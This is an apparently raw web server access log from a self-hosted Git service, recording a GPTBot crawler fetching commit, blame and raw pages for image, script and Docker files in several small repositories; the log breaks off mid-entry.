"/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=html%2fassets%2fjs%2fscript.js" [Client 74.7.227.38] [Length 18604] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" -[17/Feb/2026:14:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" [Client 74.7.227.38] [Length 57051] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:14:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 10851] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/favicon.ico" -[17/Feb/2026:14:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 10818] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" -[17/Feb/2026:14:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10702] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm" -[17/Feb/2026:14:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641753] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508465] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699374] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498816] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692377] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:14:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429929] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10697] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm" -[17/Feb/2026:14:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:14:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 317774] [Gzip 14.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main" -[17/Feb/2026:14:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fDockerfile" [Client 74.7.227.38] [Length 25431] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" -[17/Feb/2026:14:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=docker-compose.yml" [Client 74.7.227.38] [Length 24679] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" -[17/Feb/2026:14:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10885] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" -[17/Feb/2026:14:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" -[17/Feb/2026:14:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10878] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" -[17/Feb/2026:14:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" -[17/Feb/2026:14:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" -[17/Feb/2026:14:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" -[17/Feb/2026:14:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641805] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10885] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" -[17/Feb/2026:14:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" -[17/Feb/2026:14:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" -[17/Feb/2026:14:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" -[17/Feb/2026:14:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699418] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 